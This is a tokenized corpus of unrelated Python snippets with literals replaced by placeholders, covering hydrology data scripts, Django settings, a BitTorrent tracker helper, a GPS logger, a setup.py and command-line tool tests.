) <EOL> d . addCallback ( anotherRoutine ) <EOL> d . callback ( None ) <EOL> def testPassingAsArgument ( self ) : <EOL> def routine ( conf ) : <EOL> c = config . Configurator ( ) <EOL> self . assertTrue ( c == conf ) <EOL> d = defer . Deferred ( ) <EOL> d . addCallback ( routine ) <EOL> d . callback ( config . Configurator ( ) ) <EOL> def tearDown ( self ) : <EOL> del self . config </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import argparse <EOL> from ecohydrolib . context import Context <EOL> from ecohydrolib . metadata import GenericMetadata <EOL> from ecohydrolib . metadata import AssetProvenance <EOL> from ecohydrolib . nhdplus2 . webservice import locateStreamflowGage <EOL> from ecohydrolib . nhdplus2 . webservice import RESPONSE_OK <EOL> from ecohydrolib . nhdplus2 . networkanalysis import getNHDReachcodeAndMeasureForGageSourceFea <EOL> from ecohydrolib . nhdplus2 . networkanalysis import getLocationForStreamGageByGageSourceFea <EOL> from ecohydrolib . spatialdata . utils import writeCoordinatePairsToPointShapefile <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:source>' , required = False , choices = [ '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> cmdline = GenericMetadata . getCommandLine ( ) <EOL> configFile = None <EOL> if args . configfile : <EOL> configFile = args . configfile <EOL> context = Context ( args . projectDir , configFile ) <EOL> if args . source == '<STR_LIT>' : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if not context . config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" & ( args . configfile , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if not context . config . has_option ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" & ( args . 
configfile , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> result = getNHDReachcodeAndMeasureForGageSourceFea ( context . config , args . gageid ) <EOL> if result : <EOL> reachcode = result [ <NUM_LIT:0> ] <EOL> measure = result [ <NUM_LIT:1> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , ) ) <EOL> result = getLocationForStreamGageByGageSourceFea ( context . config , args . gageid ) <EOL> if result : <EOL> gage_lat = result [ <NUM_LIT:1> ] <EOL> gage_lon = result [ <NUM_LIT:0> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , ) ) <EOL> source = '<STR_LIT>' <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> else : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> ( response , source ) = locateStreamflowGage ( context . config , args . gageid ) <EOL> if response [ '<STR_LIT:message>' ] != RESPONSE_OK : <EOL> sys . exit ( "<STR_LIT>" % ( args . gageid , response [ '<STR_LIT:message>' ] ) ) <EOL> else : <EOL> reachcode = response [ '<STR_LIT>' ] <EOL> measure = response [ '<STR_LIT>' ] <EOL> gage_lat = response [ '<STR_LIT>' ] <EOL> gage_lon = response [ '<STR_LIT>' ] <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> shpFilename = writeCoordinatePairsToPointShapefile ( context . projectDir , "<STR_LIT>" , <EOL> "<STR_LIT>" , [ args . gageid ] , [ ( gage_lon , gage_lat ) ] ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , '<STR_LIT>' ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , args . gageid ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , reachcode ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , measure ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , gage_lat ) <EOL> GenericMetadata . writeStudyAreaEntry ( context , '<STR_LIT>' , gage_lon ) <EOL> asset = AssetProvenance ( GenericMetadata . MANIFEST_SECTION ) <EOL> asset . name = '<STR_LIT>' <EOL> asset . dcIdentifier = shpFilename <EOL> asset . 
dcSource = source <EOL> asset . dcTitle = '<STR_LIT>' <EOL> asset . dcPublisher = '<STR_LIT>' <EOL> asset . dcDescription = cmdline <EOL> asset . writeToMetadata ( context ) <EOL> GenericMetadata . appendProcessingHistoryItem ( context , cmdline ) </s>
<s> """<STR_LIT>""" <EOL> from ecohydrolib . wcslib import getRasterForBoundingBox <EOL> COVERAGE_SRTM_1DEG_AUS = '<STR_LIT>' <EOL> COVERAGE_SRTM_1DEG_AUS_HYDRO = '<STR_LIT>' <EOL> COVERAGE_SRTM_1DEG_AUS_SMOOTH = '<STR_LIT>' <EOL> SUPPORTED_COVERAGE = [ COVERAGE_SRTM_1DEG_AUS , COVERAGE_SRTM_1DEG_AUS_HYDRO , COVERAGE_SRTM_1DEG_AUS_SMOOTH ] <EOL> COVERAGE_DESC = { COVERAGE_SRTM_1DEG_AUS : '<STR_LIT>' , <EOL> COVERAGE_SRTM_1DEG_AUS_HYDRO : '<STR_LIT>' , <EOL> COVERAGE_SRTM_1DEG_AUS_SMOOTH : '<STR_LIT>' } <EOL> FORMAT_GEOTIFF = '<STR_LIT>' <EOL> FORMAT_NITF = '<STR_LIT>' <EOL> FORMAT_HDF = '<STR_LIT>' <EOL> SUPPORTED_FORMATS = [ FORMAT_GEOTIFF , FORMAT_NITF , FORMAT_HDF ] <EOL> MIME_TYPE = { FORMAT_GEOTIFF : '<STR_LIT>' , <EOL> FORMAT_NITF : '<STR_LIT>' , <EOL> FORMAT_HDF : '<STR_LIT>' <EOL> } <EOL> HOST = '<STR_LIT>' <EOL> URL_PROTO = '<STR_LIT>' <EOL> def getDEMForBoundingBox ( config , outputDir , outDEMFilename , bbox , coverage = COVERAGE_SRTM_1DEG_AUS , srs = '<STR_LIT>' , fmt = FORMAT_GEOTIFF , overwrite = True ) : <EOL> """<STR_LIT>""" <EOL> assert ( fmt in SUPPORTED_FORMATS ) <EOL> assert ( coverage in SUPPORTED_COVERAGE ) <EOL> return getRasterForBoundingBox ( config , outputDir , outDEMFilename , HOST , URL_PROTO , MIME_TYPE [ fmt ] , bbox , coverage , srs , fmt , <EOL> response_crs = srs , store = False , overwrite = overwrite ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> AUTH_USER_MODEL = '<STR_LIT>' <EOL> with open ( '<STR_LIT>' ) as fp : <EOL> SECRET_KEY = fp . read ( ) . strip ( ) <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> } <EOL> } <EOL> with open ( BASE_DIR + '<STR_LIT>' ) as fp : <EOL> DATABASES [ '<STR_LIT:default>' ] [ '<STR_LIT>' ] = fp . read ( ) . strip ( ) <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import os <EOL> import logging <EOL> import logging . handlers <EOL> import shelve <EOL> from socket import inet_aton <EOL> from struct import pack <EOL> import tornado . web <EOL> import binascii <EOL> try : <EOL> from ConfigParser import RawConfigParser <EOL> from httplib import responses <EOL> except ImportError : <EOL> from configparser import RawConfigParser <EOL> from http . client import responses <EOL> CONFIG_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> DB_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> LOG_PATH = os . path . expanduser ( '<STR_LIT>' ) <EOL> PEER_INCREASE_LIMIT = <NUM_LIT:30> <EOL> DEFAULT_ALLOWED_PEERS = <NUM_LIT:50> <EOL> MAX_ALLOWED_PEERS = <NUM_LIT> <EOL> INFO_HASH_LEN = <NUM_LIT:20> * <NUM_LIT:2> <EOL> PEER_ID_LEN = <NUM_LIT:20> <EOL> INVALID_REQUEST_TYPE = <NUM_LIT:100> <EOL> MISSING_INFO_HASH = <NUM_LIT> <EOL> MISSING_PEER_ID = <NUM_LIT> <EOL> MISSING_PORT = <NUM_LIT> <EOL> INVALID_INFO_HASH = <NUM_LIT> <EOL> INVALID_PEER_ID = <NUM_LIT> <EOL> INVALID_NUMWANT = <NUM_LIT> <EOL> GENERIC_ERROR = <NUM_LIT> <EOL> PYTT_RESPONSE_MESSAGES = { <EOL> INVALID_REQUEST_TYPE : '<STR_LIT>' , <EOL> MISSING_INFO_HASH : '<STR_LIT>' , <EOL> MISSING_PEER_ID : '<STR_LIT>' , <EOL> MISSING_PORT : '<STR_LIT>' , <EOL> INVALID_INFO_HASH : '<STR_LIT>' % INFO_HASH_LEN , <EOL> INVALID_PEER_ID : '<STR_LIT>' % PEER_ID_LEN , <EOL> INVALID_NUMWANT : '<STR_LIT>' % MAX_ALLOWED_PEERS , <EOL> GENERIC_ERROR : '<STR_LIT>' , <EOL> } <EOL> responses . update ( PYTT_RESPONSE_MESSAGES ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def setup_logging ( debug = False ) : <EOL> """<STR_LIT>""" <EOL> if debug : <EOL> level = logging . DEBUG <EOL> else : <EOL> level = logging . INFO <EOL> log_handler = logging . handlers . RotatingFileHandler ( LOG_PATH , <EOL> maxBytes = <NUM_LIT> * <NUM_LIT> , <EOL> backupCount = <NUM_LIT:2> ) <EOL> root_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> root_logger . 
setLevel ( level ) <EOL> format = '<STR_LIT>' <EOL> formatter = logging . Formatter ( format ) <EOL> log_handler . setFormatter ( formatter ) <EOL> root_logger . addHandler ( log_handler ) <EOL> def create_config ( path ) : <EOL> """<STR_LIT>""" <EOL> logging . info ( '<STR_LIT>' % CONFIG_PATH ) <EOL> config = RawConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT:port>' , '<STR_LIT>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:5>' ) <EOL> config . set ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ) <EOL> with open ( path , '<STR_LIT:w>' ) as f : <EOL> config . write ( f ) <EOL> def create_pytt_dirs ( ) : <EOL> """<STR_LIT>""" <EOL> logging . info ( '<STR_LIT>' ) <EOL> for path in [ CONFIG_PATH , DB_PATH , LOG_PATH ] : <EOL> dirname = os . path . dirname ( path ) <EOL> if not os . path . exists ( dirname ) : <EOL> os . makedirs ( dirname ) <EOL> if not os . path . exists ( CONFIG_PATH ) : <EOL> create_config ( CONFIG_PATH ) <EOL> class BaseHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def decode_argument ( self , value , name ) : <EOL> if name == '<STR_LIT>' : <EOL> value = binascii . hexlify ( value ) <EOL> return super ( BaseHandler , self ) . decode_argument ( value , name ) <EOL> class ConfigError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class Config : <EOL> """<STR_LIT>""" <EOL> __shared_state = { } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = self . __shared_state <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __config = RawConfigParser ( ) <EOL> if self . __config . read ( CONFIG_PATH ) == [ ] : <EOL> raise ConfigError ( '<STR_LIT>' % CONFIG_PATH ) <EOL> return self . __config <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return <NUM_LIT:0> <EOL> del self . 
__config <EOL> class Database : <EOL> """<STR_LIT>""" <EOL> __shared_state = { } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ = self . __shared_state <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __db = shelve . open ( DB_PATH , writeback = True ) <EOL> return self . __db <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return <NUM_LIT:0> <EOL> self . __db . close ( ) <EOL> del self . __db <EOL> def get_config ( ) : <EOL> """<STR_LIT>""" <EOL> return Config ( ) . get ( ) <EOL> def get_db ( ) : <EOL> """<STR_LIT>""" <EOL> return Database ( ) . get ( ) <EOL> def close_db ( ) : <EOL> """<STR_LIT>""" <EOL> Database ( ) . close ( ) <EOL> def no_of_seeders ( info_hash ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> count = <NUM_LIT:0> <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> if peer_info [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> return count <EOL> def no_of_leechers ( info_hash ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> count = <NUM_LIT:0> <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> if peer_info [ <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> return count <EOL> def store_peer_info ( info_hash , peer_id , ip , port , status ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> if info_hash in db : <EOL> if ( peer_id , ip , port , status ) not in db [ info_hash ] : <EOL> db [ info_hash ] . 
append ( ( peer_id , ip , port , status ) ) <EOL> else : <EOL> db [ info_hash ] = [ ( peer_id , ip , port , status ) ] <EOL> def get_peer_list ( info_hash , numwant , compact , no_peer_id ) : <EOL> """<STR_LIT>""" <EOL> db = get_db ( ) <EOL> if compact : <EOL> byteswant = numwant * <NUM_LIT:6> <EOL> compact_peers = b'<STR_LIT>' <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> ip = inet_aton ( peer_info [ <NUM_LIT:1> ] ) <EOL> port = pack ( '<STR_LIT>' , int ( peer_info [ <NUM_LIT:2> ] ) ) <EOL> compact_peers += ( ip + port ) <EOL> logging . debug ( '<STR_LIT>' % compact_peers [ : byteswant ] ) <EOL> return compact_peers [ : byteswant ] <EOL> else : <EOL> peers = [ ] <EOL> if info_hash in db : <EOL> for peer_info in db [ info_hash ] : <EOL> p = { } <EOL> p [ '<STR_LIT>' ] , p [ '<STR_LIT>' ] , p [ '<STR_LIT:port>' ] , _ = peer_info <EOL> if no_peer_id : <EOL> del p [ '<STR_LIT>' ] <EOL> peers . append ( p ) <EOL> logging . debug ( '<STR_LIT>' % peers [ : numwant ] ) <EOL> return peers [ : numwant ] </s>
<s> import location <EOL> import gobject <EOL> import sys <EOL> import time <EOL> import math <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> sys . stderr . write ( '<STR_LIT>' + sys . argv [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> acc = <NUM_LIT> <EOL> prepend_text = sys . argv [ <NUM_LIT:3> ] <EOL> sleep_time = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> filename = sys . argv [ <NUM_LIT:1> ] <EOL> class gps_fix : <EOL> fix = None <EOL> def on_error ( self , control , error , data ) : <EOL> print "<STR_LIT>" % error <EOL> data . quit ( ) <EOL> def on_changed ( self , device , data ) : <EOL> if not device : <EOL> return <EOL> cacc = "<STR_LIT>" % ( time . time ( ) , device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] , device . fix [ <NUM_LIT:6> ] / <NUM_LIT:100> , device . fix [ <NUM_LIT:11> ] ) <EOL> if not device . fix [ <NUM_LIT:6> ] == device . fix [ <NUM_LIT:6> ] : <EOL> return <EOL> if device . fix [ <NUM_LIT:6> ] > acc : <EOL> return <EOL> if device . fix : <EOL> if device . fix [ <NUM_LIT:1> ] & location . GPS_DEVICE_LATLONG_SET : <EOL> f = open ( filename , "<STR_LIT:a>" ) <EOL> pos = "<STR_LIT>" % ( prepend_text , time . time ( ) , device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] , device . fix [ <NUM_LIT:6> ] / <NUM_LIT:100> ) <EOL> self . fix = ( device . fix [ <NUM_LIT:4> ] , device . fix [ <NUM_LIT:5> ] ) <EOL> f . write ( pos ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> data . stop ( ) <EOL> def on_stop ( self , control , data ) : <EOL> data . quit ( ) <EOL> def start_location ( self , data ) : <EOL> data . start ( ) <EOL> return False <EOL> def __init__ ( self ) : <EOL> loop = gobject . MainLoop ( ) <EOL> control = location . GPSDControl . get_default ( ) <EOL> device = location . GPSDevice ( ) <EOL> control . set_properties ( preferred_method = location . METHOD_USER_SELECTED , <EOL> preferred_interval = location . INTERVAL_DEFAULT ) <EOL> control . connect ( "<STR_LIT>" , self . 
on_error , loop ) <EOL> device . connect ( "<STR_LIT>" , self . on_changed , control ) <EOL> control . connect ( "<STR_LIT>" , self . on_stop , loop ) <EOL> gobject . idle_add ( self . start_location , control ) <EOL> loop . run ( ) <EOL> def haversine ( lat1 , lon1 , lat2 , lon2 ) : <EOL> R = <NUM_LIT> <EOL> dLat = math . radians ( lat2 - lat1 ) <EOL> dLon = math . radians ( lon2 - lon1 ) <EOL> lat1 = math . radians ( lat1 ) <EOL> lat2 = math . radians ( lat2 ) <EOL> a = math . sin ( dLat / <NUM_LIT:2> ) * math . sin ( dLat / <NUM_LIT:2> ) + math . sin ( dLon / <NUM_LIT:2> ) * math . sin ( dLon / <NUM_LIT:2> ) * math . cos ( lat1 ) * math . cos ( lat2 ) <EOL> c = <NUM_LIT:2> * math . asin ( math . sqrt ( a ) ) <EOL> return R * c * <NUM_LIT> <EOL> lastPos = ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> while ( <NUM_LIT:1> ) : <EOL> g = gps_fix ( ) <EOL> distanceMoved = haversine ( lastPos [ <NUM_LIT:0> ] , lastPos [ <NUM_LIT:1> ] , g . fix [ <NUM_LIT:0> ] , g . fix [ <NUM_LIT:1> ] ) <EOL> if ( distanceMoved < <NUM_LIT:100> ) : <EOL> time . sleep ( sleep_time ) <EOL> lastPos = ( g . fix [ <NUM_LIT:0> ] , g . fix [ <NUM_LIT:1> ] ) </s>
<s> import sys , os , shutil <EOL> from distutils . core import setup , Extension <EOL> shutil . copyfile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = [ "<STR_LIT>" ] , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> scripts = [ '<STR_LIT>' ] , <EOL> data_files = [ ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ] , <EOL> ) <EOL> print "<STR_LIT>" <EOL> try : <EOL> removeall ( "<STR_LIT>" ) <EOL> os . rmdir ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> try : <EOL> os . remove ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> def capture ( cmd ) : <EOL> return os . popen ( cmd ) . read ( ) . strip ( ) <EOL> def removeall ( path ) : <EOL> if not os . path . isdir ( path ) : <EOL> return <EOL> files = os . listdir ( path ) <EOL> for x in files : <EOL> fullpath = os . path . join ( path , x ) <EOL> if os . path . isfile ( fullpath ) : <EOL> f = os . remove <EOL> rmgeneric ( fullpath , f ) <EOL> elif os . path . isdir ( fullpath ) : <EOL> removeall ( fullpath ) <EOL> f = os . rmdir <EOL> rmgeneric ( fullpath , f ) <EOL> def rmgeneric ( path , __func__ ) : <EOL> try : <EOL> __func__ ( path ) <EOL> except OSError , ( errno , strerror ) : <EOL> pass </s>
<s> import stawk_db <EOL> import datetime <EOL> cursor = stawk_db . dbconnect ( ) <EOL> drones = [ ] <EOL> day = '<STR_LIT>' <EOL> st = day + '<STR_LIT>' <EOL> fi = day + '<STR_LIT>' <EOL> cursor . execute ( "<STR_LIT>" , ( st , fi ) ) <EOL> for r in cursor . fetchall ( ) : <EOL> drones . append ( ( r [ <NUM_LIT:0> ] , r [ <NUM_LIT:1> ] , r [ <NUM_LIT:2> ] ) ) <EOL> for d in drones : <EOL> drone_id = d [ <NUM_LIT:0> ] <EOL> print drone_id <EOL> fp , lp = d [ <NUM_LIT:1> ] , d [ <NUM_LIT:2> ] <EOL> fp = fp - datetime . timedelta ( minutes = fp . minute , seconds = fp . second ) <EOL> lp = lp - datetime . timedelta ( minutes = ( lp . minute - <NUM_LIT> ) , seconds = lp . second ) <EOL> hours = ( ( ( lp - fp ) ) . seconds ) / <NUM_LIT> <EOL> for h in range ( hours ) : <EOL> frm = fp + datetime . timedelta ( hours = h ) <EOL> to = fp + datetime . timedelta ( hours = h + <NUM_LIT:1> ) <EOL> cursor . execute ( "<STR_LIT>" , ( frm , to , drone_id ) ) <EOL> count = int ( cursor . fetchone ( ) [ <NUM_LIT:0> ] ) <EOL> print "<STR_LIT>" % ( frm . strftime ( "<STR_LIT>" ) , to . strftime ( "<STR_LIT>" ) , count ) </s>
<s> from gitdh . modules import Module <EOL> from gitdh import git <EOL> from syslog import syslog , LOG_INFO , LOG_WARNING <EOL> class PostReceiveSource ( Module ) : <EOL> def isEnabled ( self , action ) : <EOL> return action == "<STR_LIT>" <EOL> def source ( self ) : <EOL> firstCommit = self . args [ <NUM_LIT:0> ] <EOL> lastCommit = self . args [ <NUM_LIT:1> ] <EOL> ref = self . args [ <NUM_LIT:2> ] <EOL> if ref . find ( "<STR_LIT>" ) == <NUM_LIT:0> : <EOL> branch = ref [ <NUM_LIT:11> : ] <EOL> else : <EOL> syslog ( LOG_WARNING , "<STR_LIT>" % ( ref , self . config . repoPath ) ) <EOL> return [ ] <EOL> try : <EOL> self . config . branches [ branch ] <EOL> except KeyError : <EOL> syslog ( LOG_INFO , "<STR_LIT>" % ( branch , self . config . repoPath ) ) <EOL> return [ ] <EOL> try : <EOL> gitRepo = git . Git ( self . config . repoPath ) <EOL> commits = gitRepo . getLog ( since = firstCommit , until = lastCommit , branch = branch ) <EOL> except git . GitException as e : <EOL> syslog ( LOG_WARNING , "<STR_LIT>" % ( e , ) ) <EOL> return [ ] <EOL> for commit in commits : <EOL> commit . status = "<STR_LIT>" <EOL> return commits </s>
<s> '''<STR_LIT>''' <EOL> from shovel import task <EOL> @ task <EOL> def hello ( ) : <EOL> '''<STR_LIT>''' <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import calendar <EOL> import datetime <EOL> import click <EOL> from . base import cli , get_timesheet_collection_for_context <EOL> @ cli . command ( short_help = "<STR_LIT>" ) <EOL> @ click . option ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:f>' , <EOL> type = click . Path ( dir_okay = False , writable = True ) ) <EOL> @ click . pass_context <EOL> def autofill ( ctx , f ) : <EOL> """<STR_LIT>""" <EOL> auto_fill_days = ctx . obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if not auto_fill_days : <EOL> ctx . obj [ '<STR_LIT>' ] . view . err ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <EOL> today = datetime . date . today ( ) <EOL> last_day = calendar . monthrange ( today . year , today . month ) <EOL> last_date = datetime . date ( today . year , today . month , last_day [ <NUM_LIT:1> ] ) <EOL> timesheet_collection = get_timesheet_collection_for_context ( <EOL> ctx , f <EOL> ) <EOL> t = timesheet_collection . timesheets [ <NUM_LIT:0> ] <EOL> t . prefill ( auto_fill_days , last_date ) <EOL> t . file . write ( t . entries ) <EOL> ctx . obj [ '<STR_LIT>' ] . msg ( "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> import codecs <EOL> import collections <EOL> import copy <EOL> from functools import wraps <EOL> import os <EOL> import re <EOL> import six <EOL> import shutil <EOL> import tempfile <EOL> from unittest import TestCase <EOL> from click . testing import CliRunner <EOL> from taxi . backends import BaseBackend , PushEntryFailed , PushEntriesFailed <EOL> from taxi . backends . registry import backends_registry <EOL> from taxi . commands . base import cli <EOL> from taxi . projects import ProjectsDb <EOL> from taxi . utils . file import expand_date <EOL> class TestBackendEntryPoint ( object ) : <EOL> """<STR_LIT>""" <EOL> class TestBackend ( BaseBackend ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( TestBackendEntryPoint . TestBackend , self ) . __init__ ( <EOL> * args , ** kwargs <EOL> ) <EOL> self . entries = [ ] <EOL> def push_entry ( self , date , entry ) : <EOL> self . entries . append ( entry ) <EOL> if entry . alias == '<STR_LIT>' : <EOL> raise PushEntryFailed ( ) <EOL> def post_push_entries ( self ) : <EOL> failed_entries = { } <EOL> for entry in self . entries : <EOL> if entry . alias == '<STR_LIT>' : <EOL> failed_entries [ entry ] = '<STR_LIT>' <EOL> if failed_entries : <EOL> raise PushEntriesFailed ( entries = failed_entries ) <EOL> def load ( self ) : <EOL> return self . TestBackend <EOL> class CommandTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> _ , self . config_file = tempfile . mkstemp ( ) <EOL> _ , self . entries_file = tempfile . mkstemp ( ) <EOL> self . taxi_dir = tempfile . mkdtemp ( ) <EOL> self . backends_original_entry_points = backends_registry . _entry_points <EOL> backends_registry . _entry_points = { <EOL> '<STR_LIT:test>' : TestBackendEntryPoint ( ) , <EOL> '<STR_LIT>' : TestBackendEntryPoint ( ) , <EOL> } <EOL> projects_db_file = os . path . join ( self . taxi_dir , <EOL> ProjectsDb . 
PROJECTS_FILE ) <EOL> with open ( projects_db_file , '<STR_LIT:w>' ) as f : <EOL> f . close ( ) <EOL> existing_settings = ( self . _settings <EOL> if hasattr ( self , '<STR_LIT>' ) <EOL> else { } ) <EOL> self . _settings = recursive_update ( { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:file>' : self . entries_file , <EOL> '<STR_LIT>' : '<STR_LIT:0>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } , existing_settings ) <EOL> def tearDown ( self ) : <EOL> backends_registry . _entry_points = self . backends_original_entry_points <EOL> entries_file = expand_date ( self . entries_file ) <EOL> os . remove ( self . config_file ) <EOL> if os . path . exists ( entries_file ) : <EOL> os . remove ( entries_file ) <EOL> shutil . rmtree ( self . taxi_dir ) <EOL> def assertLineIn ( self , line , content ) : <EOL> """<STR_LIT>""" <EOL> def remove_spaces ( text ) : <EOL> chars_to_strip = [ '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ] <EOL> for char in chars_to_strip : <EOL> text = text . replace ( char , '<STR_LIT>' ) <EOL> return text <EOL> self . assertIn ( <EOL> remove_spaces ( line ) , <EOL> remove_spaces ( content ) , <EOL> "<STR_LIT>" % ( line , content ) <EOL> ) <EOL> def settings ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return override_settings ( * args , container = self , ** kwargs ) <EOL> def write_config ( self , config ) : <EOL> with open ( self . config_file , '<STR_LIT:w>' ) as f : <EOL> for ( section , params ) in six . iteritems ( config ) : <EOL> f . write ( "<STR_LIT>" % section ) <EOL> for ( param , value ) in six . iteritems ( params ) : <EOL> f . write ( "<STR_LIT>" % ( param , value ) ) <EOL> def write_entries ( self , contents ) : <EOL> with 